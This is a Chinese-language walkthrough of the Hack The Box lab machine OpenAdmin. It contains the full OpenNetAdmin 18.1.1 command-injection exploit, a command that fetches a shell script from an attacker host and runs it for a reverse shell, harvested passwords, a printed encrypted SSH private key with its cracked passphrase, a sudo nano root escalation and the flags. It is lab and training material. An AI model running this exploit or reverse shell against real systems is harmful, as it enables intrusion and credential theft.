简介
1.端口扫描
2.WEB目录、URI枚举
3.Linux信息收集
4.Crack id_rsa
5.sudoers misconfig
靶机状态:rooted.
信息收集
端口扫描
扫描开放的端口、服务和对应的版本,然后查找对应版本是否存在N Day可直接利用1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23./owef.sh OpenAdmin 10.10.10.171
22,80
Starting Nmap 7.70 ( https://nmap.org ) at 2020-01-09 13:41 CST
Pre-scan script results:
| broadcast-avahi-dos:
| Discovered hosts:
| 224.0.0.251
| After NULL UDP avahi packet DoS (CVE-2011-1002).
|_ Hosts are all up (not vulnerable).
Nmap scan report for localhost (10.10.10.171)
Host is up (0.44s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 177.13 seconds
结果分析:
- 22端口,ssh服务,OpenSSh 7.6p1
- 80端口,http服务,Apache httpd 2.4.29
这两个服务无可可利用的RCE,开始看http服务
目录枚举、url枚举、手动审计
枚举目录之后找到one目录,访问ona之后,从页面的download和here两处连接中找到opennetadmin的超链接,标识了ona是opennetadmin系统a,版本为18.1.1,于是,查找opennetadmin系统是否存在N Day,发现2019年爆出登陆接口的远程命令执行(RCE)。1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23# Exploit Title: OpenNetAdmin 18.1.1 - Remote Code Execution
# Date: 2019-11-19
# Exploit Author: mattpascoe
# Vendor Homepage: http://opennetadmin.com/
# Software Link: https://github.com/opennetadmin/ona
# Version: v18.1.1
# Tested on: Linux
# Exploit Title: OpenNetAdmin v18.1.1 RCE
# Date: 2019-11-19
# Exploit Author: mattpascoe
# Vendor Homepage: http://opennetadmin.com/
# Software Link: https://github.com/opennetadmin/ona
# Version: v18.1.1
# Tested on: Linux
URL="${1}"
while true;do
echo -n "$ "; read cmd
curl --silent -d "xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E;echo \"BEGIN\";${cmd};echo \"END\"&xajaxargs[]=ping" "${URL}" | sed -n -e '/BEGIN/,/END/ p' | tail -n +2 | head -n -1
done
从exp中可以看出登陆接口的xajaxargs[]接口存在操作系统命令注入,于是通过bp抓包,修改xajaxargs[]参数值,通过wget 10.10.14.39/shell.sh和bash shell.sh拿到反弹shell.
user: jimmy
os信息收集
1.查看sudoers配置:sudo -l,发现不存在;
2.查看系统内核:uname -a,返回结果“Linux openadmin 4.15.0-70-generic #79-Ubuntu SMP Tue Nov 12 10:36:11 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux”,内核版本4.15.0,暂时不存在提权漏洞;
3.查看WEB目录下包含关键字的文件,关键字列表为”password、passwd、token、secret、db_login、db_passwd”等,找到”database_settings.inc.php”文件,内容如下:
1 |
|
找到一组账号密码:”ona_sys : n1nj4W4rri0R!”
4.查看系统用户,cat /etc/passwd发现”root”、”jimmy”、”jooanna”三个用户,尝试用上面找到的密码登陆ssh,最后用jimmy登陆ssh;
user: joanna
新思路 如果内核、计划任务、文件、服务、进程、常规端口都没有思路,可以看看是否存在本地监听的非常规端口,通过telnet探测,检测这些端口对应的服务内容;
信息收集
通过linpeas.sh搜集系统信息,并没有发现可利用的内容,然后在forum上看到大佬们的tips,查看端口,然后注意到本地监听了一个52846的端口,telnet探测,发现是http服务,于是用curl查看页面内容:1
jimmy@openadmin:~$ curl 127.0.0.1:52846
响应如下:1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94<?
// error_reporting(E_ALL);
// ini_set("display_errors", 1);
?>
<html lang = "en">
<head>
<title>Tutorialspoint.com</title>
<link href = "css/bootstrap.min.css" rel = "stylesheet">
<style>
body {
padding-top: 40px;
padding-bottom: 40px;
background-color: #ADABAB;
}
.form-signin {
max-width: 330px;
padding: 15px;
margin: 0 auto;
color: #017572;
}
.form-signin .form-signin-heading,
.form-signin .checkbox {
margin-bottom: 10px;
}
.form-signin .checkbox {
font-weight: normal;
}
.form-signin .form-control {
position: relative;
height: auto;
-webkit-box-sizing: border-box;
-moz-box-sizing: border-box;
box-sizing: border-box;
padding: 10px;
font-size: 16px;
}
.form-signin .form-control:focus {
z-index: 2;
}
.form-signin input[type="email"] {
margin-bottom: -1px;
border-bottom-right-radius: 0;
border-bottom-left-radius: 0;
border-color:#017572;
}
.form-signin input[type="password"] {
margin-bottom: 10px;
border-top-left-radius: 0;
border-top-right-radius: 0;
border-color:#017572;
}
h2{
text-align: center;
color: #017572;
}
</style>
</head>
<body>
<h2>Enter Username and Password</h2>
<div class = "container form-signin">
<h2 class="featurette-heading">Login Restricted.<span class="text-muted"></span></h2>
</div> <!-- /container -->
<div class = "container">
<form class = "form-signin" role = "form"
action = "/index.php" method = "post">
<h4 class = "form-signin-heading"></h4>
<input type = "text" class = "form-control"
name = "username"
required autofocus></br>
<input type = "password" class = "form-control"
name = "password" required>
<button class = "btn btn-lg btn-primary btn-block" type = "submit"
name = "login">Login</button>
</form>
</div>
</body>
</html>
发现这是一个新的登陆页面,存在index.php文件,于是搜索index.php文件,查找文件源码所在位置:1
jimmy@openadmin:~$ find / -name "index.php" 2>/dev/null
响应如下:1
2
3
4
5
6
7
8
9
10
11
12
13
14/var/www/internal/index.php
/var/www/html/sierra/vendors/revolution/js/extensions/source/index.php
/var/www/html/sierra/vendors/revolution/js/extensions/index.php
/var/www/html/sierra/vendors/revolution/js/source/index.php
/var/www/html/sierra/vendors/revolution/js/index.php
/var/www/html/sierra/vendors/revolution/assets/svg/index.php
/var/www/html/sierra/vendors/revolution/css/index.php
/var/www/html/sierra/vendors/revolution/fonts/pe-icon-7-stroke/css/index.php
/var/www/html/sierra/vendors/revolution/fonts/pe-icon-7-stroke/fonts/index.php
/var/www/html/sierra/vendors/revolution/fonts/pe-icon-7-stroke/index.php
/var/www/html/sierra/vendors/revolution/fonts/revicons/index.php
/var/www/html/sierra/vendors/revolution/fonts/font-awesome/index.php
/var/www/html/sierra/vendors/revolution/fonts/index.php
/var/www/html/sierra/vendors/revolution/index.php
留意到一个不再html中的index.php,应该就是这个,查看如下:1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
ob_start();
session_start();
// error_reporting(E_ALL);
// ini_set("display_errors", 1);
<html lang = "en">
<head>
<title>Tutorialspoint.com</title>
<link href = "css/bootstrap.min.css" rel = "stylesheet">
<style>
body {
padding-top: 40px;
padding-bottom: 40px;
background-color: #ADABAB;
}
.form-signin {
max-width: 330px;
padding: 15px;
margin: 0 auto;
color: #017572;
}
.form-signin .form-signin-heading,
.form-signin .checkbox {
margin-bottom: 10px;
}
.form-signin .checkbox {
font-weight: normal;
}
.form-signin .form-control {
position: relative;
height: auto;
-webkit-box-sizing: border-box;
-moz-box-sizing: border-box;
box-sizing: border-box;
padding: 10px;
font-size: 16px;
}
.form-signin .form-control:focus {
z-index: 2;
}
.form-signin input[type="email"] {
margin-bottom: -1px;
border-bottom-right-radius: 0;
border-bottom-left-radius: 0;
border-color:#017572;
}
.form-signin input[type="password"] {
margin-bottom: 10px;
border-top-left-radius: 0;
border-top-right-radius: 0;
border-color:#017572;
}
h2{
text-align: center;
color: #017572;
}
</style>
</head>
<body>
<h2>Enter Username and Password</h2>
<div class = "container form-signin">
<h2 class="featurette-heading">Login Restricted.<span class="text-muted"></span></h2>
$msg = '';
if (isset($_POST['login']) && !empty($_POST['username']) && !empty($_POST['password'])) {
if ($_POST['username'] == 'jimmy' && hash('sha512',$_POST['password']) == '00e302ccdcf1c60b8ad50ea50cf72b939705f49f40f0dc658801b4680b7d758eebdc2e9f9ba8ba3ef8a8bb9a796d34ba2e856838ee9bdde852b8ec3b3a0523b1') {
$_SESSION['username'] = 'jimmy';
header("Location: /main.php");
} else {
$msg = 'Wrong username or password.';
}
}
</div> <!-- /container -->
<div class = "container">
<form class = "form-signin" role = "form"
action = "<?php echo htmlspecialchars($_SERVER['PHP_SELF']);
?>" method = "post">
<h4 class = "form-signin-heading"><?php echo $msg; ?></h4>
<input type = "text" class = "form-control"
name = "username"
required autofocus></br>
<input type = "password" class = "form-control"
name = "password" required>
<button class = "btn btn-lg btn-primary btn-block" type = "submit"
name = "login">Login</button>
</form>
</div>
</body>
</html>
分析代码逻辑:如果用户名为jimmy,密码的sha512为”00e302ccdcf1c60b8ad50ea50cf72b939705f49f40f0dc658801b4680b7d758eebdc2e9f9ba8ba3ef8a8bb9a796d34ba2e856838ee9bdde852b8ec3b3a0523b1”,则设置session字段username的值为”jimmy”并跳转到main.php页面,查看main.php页面源码,如下:1
2
3
4
5
6
7
8
9
10 session_start(); if (!isset ($_SESSION['username'])) { header("Location: /index.php"); };
# Open Admin Trusted
# OpenAdmin
$output = shell_exec('cat /home/joanna/.ssh/id_rsa');
echo "<pre>$output</pre>";
<html>
<h3>Don't forget your "ninja" password</h3>
Click here to logout <a href="logout.php" tite = "Logout">Session
</html>
main.php文件通过shell_exec函数读取”/home/joanna/.ssh/id_rsa”文件,如果拿到了用户的私钥,就可以爆破私钥的密码,然后通过私钥登陆系统。
端口转发,访问52846端口1
2# my machine
$ ssh jimmy@10.10.10.171 -L 2145:localhost:52846
然后访问本地的2145端口,可正常访问目标的52846端口
查询”00e302ccdcf1c60b8ad50ea50cf72b939705f49f40f0dc658801b4680b7d758eebdc2e9f9ba8ba3ef8a8bb9a796d34ba2e856838ee9bdde852b8ec3b3a0523b1”的明文为“Revealed”
登陆系统,拿到joanna用户的ssh私钥,如下:1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,2AF25344B8391A25A9B318F3FD767D6D
kG0UYIcGyaxupjQqaS2e1HqbhwRLlNctW2HfJeaKUjWZH4usiD9AtTnIKVUOpZN8
ad/StMWJ+MkQ5MnAMJglQeUbRxcBP6++Hh251jMcg8ygYcx1UMD03ZjaRuwcf0YO
ShNbbx8Euvr2agjbF+ytimDyWhoJXU+UpTD58L+SIsZzal9U8f+Txhgq9K2KQHBE
6xaubNKhDJKs/6YJVEHtYyFbYSbtYt4lsoAyM8w+pTPVa3LRWnGykVR5g79b7lsJ
ZnEPK07fJk8JCdb0wPnLNy9LsyNxXRfV3tX4MRcjOXYZnG2Gv8KEIeIXzNiD5/Du
y8byJ/3I3/EsqHphIHgD3UfvHy9naXc/nLUup7s0+WAZ4AUx/MJnJV2nN8o69JyI
9z7V9E4q/aKCh/xpJmYLj7AmdVd4DlO0ByVdy0SJkRXFaAiSVNQJY8hRHzSS7+k4
piC96HnJU+Z8+1XbvzR93Wd3klRMO7EesIQ5KKNNU8PpT+0lv/dEVEppvIDE/8h/
/U1cPvX9Aci0EUys3naB6pVW8i/IY9B6Dx6W4JnnSUFsyhR63WNusk9QgvkiTikH
40ZNca5xHPij8hvUR2v5jGM/8bvr/7QtJFRCmMkYp7FMUB0sQ1NLhCjTTVAFN/AZ
fnWkJ5u+To0qzuPBWGpZsoZx5AbA4Xi00pqqekeLAli95mKKPecjUgpm+wsx8epb
9FtpP4aNR8LYlpKSDiiYzNiXEMQiJ9MSk9na10B5FFPsjr+yYEfMylPgogDpES80
X1VZ+N7S8ZP+7djB22vQ+/pUQap3PdXEpg3v6S4bfXkYKvFkcocqs8IivdK1+UFg
S33lgrCM4/ZjXYP2bpuE5v6dPq+hZvnmKkzcmT1C7YwK1XEyBan8flvIey/ur/4F
FnonsEl16TZvolSt9RH/19B7wfUHXXCyp9sG8iJGklZvteiJDG45A4eHhz8hxSzh
Th5w5guPynFv610HJ6wcNVz2MyJsmTyi8WuVxZs8wxrH9kEzXYD/GtPmcviGCexa
RTKYbgVn4WkJQYncyC0R1Gv3O8bEigX4SYKqIitMDnixjM6xU0URbnT1+8VdQH7Z
uhJVn1fzdRKZhWWlT+d+oqIiSrvd6nWhttoJrjrAQ7YWGAm2MBdGA/MxlYJ9FNDr
1kxuSODQNGtGnWZPieLvDkwotqZKzdOg7fimGRWiRv6yXo5ps3EJFuSU1fSCv2q2
XGdfc8ObLC7s3KZwkYjG82tjMZU+P5PifJh6N0PqpxUCxDqAfY+RzcTcM/SLhS79
yPzCZH8uWIrjaNaZmDSPC/z+bWWJKuu4Y1GCXCqkWvwuaGmYeEnXDOxGupUchkrM
+4R21WQ+eSaULd2PDzLClmYrplnpmbD7C7/ee6KDTl7JMdV25DM9a16JYOneRtMt
qlNgzj0Na4ZNMyRAHEl1SF8a72umGO2xLWebDoYf5VSSSZYtCNJdwt3lF7I8+adt
z0glMMmjR2L5c2HdlTUt5MgiY8+qkHlsL6M91c4diJoEXVh+8YpblAoogOHHBlQe
K1I1cqiDbVE/bmiERK+G4rqa0t7VQN6t2VWetWrGb+Ahw/iMKhpITWLWApA3k9EN
-----END RSA PRIVATE KEY-----
john破解id_rsa
1.转换id_rsa为john可破解的格式:root@kali:~# python /usr/share/john/ssh2john.py id_rsa > id_rsa.txt
2.使用字段破解:john --format=SSH --wordlist=/usr/share/wordlists/rockyou.txt id_rsa.txt,密码:bloodninjas
通过id_rsa和私钥密码登陆ssh
1.设置id_rsa文件权限:chmod 600 joanna_id_rsa
2.登陆:ssh -i joanna_id_rsa joanna@10.10.10.171,然后出现Enter passphrase for key 'joanna_id_rsa':的提示,输入id-rsa的密码”bloodninjas”即可登陆
拿到user.txt:c9b2cf07d40807e62af62660f0c81b5f
priv: root
1.查看sudoers配置:sudo -l,发现nano,通过nano提权
1 | joanna@openadmin:~$ sudo -l |
nano执行命令(mac)sudo /bin/nano /opt/priv,然后进入nano编辑界面;键入:”control+R control+X”,然后进入如下界面:
然后输入反弹shell命令,获得root的shell:1
2
3
4
5
6
7
8
9
10
11
12nc -lv 4444
root@openadmin:~# ls
ls
user.txt
root@openadmin:~# cd /root
cd /root
root@openadmin:/root# ls
ls
root.txt
root@openadmin:/root# cat root.txt
cat root.txt
2f907ed450b361b2c2bf4e8795d5b561
